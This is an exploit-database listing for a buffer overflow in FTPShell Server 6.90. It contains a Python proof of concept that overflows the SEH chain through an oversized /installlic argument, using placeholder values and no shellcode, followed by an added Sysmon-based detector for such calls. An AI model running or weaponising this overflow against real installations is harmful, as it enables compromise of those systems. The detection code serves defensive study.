FTPShell Server 6.90 Buffer Overflow Exploit

01 Jul 2020 | Reported by Saeed reza Zamanian | Type: zdt | Source: 0day.today

FTPShell Server 6.90 Buffer Overflow Exploit with SEH Overwrite

Code
# Exploit Title: FTPShell Server 6.90 (ftpshelldmgr.exe)- Buffer Overflow (SEH)(PoC)
# Exploit Author: Saeed reza Zamanian
# Vendor: Code Origin
# Vendor Homepage: https://www.ftpshell.com/
# Software Link: https://www.ftpshell.com/downloadserver.htm
# Version: 6.90 Release Date  : Jan 31, 2020
#   Tested On: Windows 7 Ultimate -- Build 7601 x64-based PC
#   Tested On: Windows Vista SP2 -- build 6002 32-bit 
#
# Replicate Crash:
#  1) Download, Install, the application
#  2) Execute the exploit (with administrative permissions)
#  3) Crash with SEH Overwrite
#
# You can also use "/installlic {PAYLOAD}" in arguments field in your debugger (immunity or olly)

# SEH chain of main thread
# Address    SE handler
# 0020FBFC   43434343
# 42424242   *** CORRUPT ENTRY ***


#!/usr/bin/python
import os

directory = 'C:\\Program Files\\FTPShellServer\\' #default
#directory = 'C:\\Program Files (x86)\\FTPShellServer\\' #directory_for_x64

offset = '\x41'*1112
nSEH = '\x42\x42\x42\x42'
SEH = '\x43\x43\x43\x43'

payload = offset+nSEH+SEH

try:
    print("[+] Creating %s sending evil payload." %len(payload))
    comm = ('cd '+directory+' && ftpshelldmgr.exe /installlic '+payload)
    stream = os.popen(comm)
    output = stream.read()
    print("[+] payload sent!")
except:
    print("Failed.")
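
A defensive counterpart to the PoC above, added here and not part of the original advisory or the vendor's code: it checks process-creation events for ftpshelldmgr.exe started with an oversized /installlic argument. The thresholds, function names and sample events are assumptions constructed for illustration; the event field names follow Sysmon Event ID 1.

```python
import re

TARGET_IMAGE = "ftpshelldmgr.exe"  # binary named in the PoC
MAX_ARG_LEN = 512                  # assumed alert threshold, well below the PoC's 1112-byte offset
MAX_RUN = 64                       # assumed limit for a run of one repeated character
SWITCH_RE = re.compile(r"(?i)/installlic\s+(.*)$", re.DOTALL)

def longest_run(s):
    """Length of the longest run of a single repeated character."""
    best = run = 0
    prev = None
    for ch in s:
        run = run + 1 if ch == prev else 1
        prev = ch
        best = max(best, run)
    return best

def inspect_event(event):
    """Return the reasons a process-creation event looks suspicious (empty list if none)."""
    image = event.get("Image", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    match = SWITCH_RE.search(event.get("CommandLine", ""))
    if image != TARGET_IMAGE or not match:
        return []
    arg = match.group(1).strip().strip('"')
    reasons = []
    if len(arg) > MAX_ARG_LEN:
        reasons.append("installlic argument is %d characters (limit %d)" % (len(arg), MAX_ARG_LEN))
    if longest_run(arg) >= MAX_RUN:
        reasons.append("repeated-character run of %d" % longest_run(arg))
    if any(ord(c) < 0x20 or ord(c) > 0x7E for c in arg):
        reasons.append("non-printable characters in argument")
    return reasons

# Constructed sample events, not captured from a real host
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\FTPShellServer\ftpshelldmgr.exe",
     "CommandLine": "ftpshelldmgr.exe /installlic ABCD-1234-EFGH-5678"},
    {"Image": r"C:\Program Files\FTPShellServer\ftpshelldmgr.exe",
     "CommandLine": "ftpshelldmgr.exe /installlic " + "A" * 1112 + "BBBBCCCC"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c echo " + "A" * 2000},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["CommandLine"][:48], "->", inspect_event(ev) or "ok")
```

The length threshold should be tuned to the longest legitimate license value seen in the environment before alerting on it.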
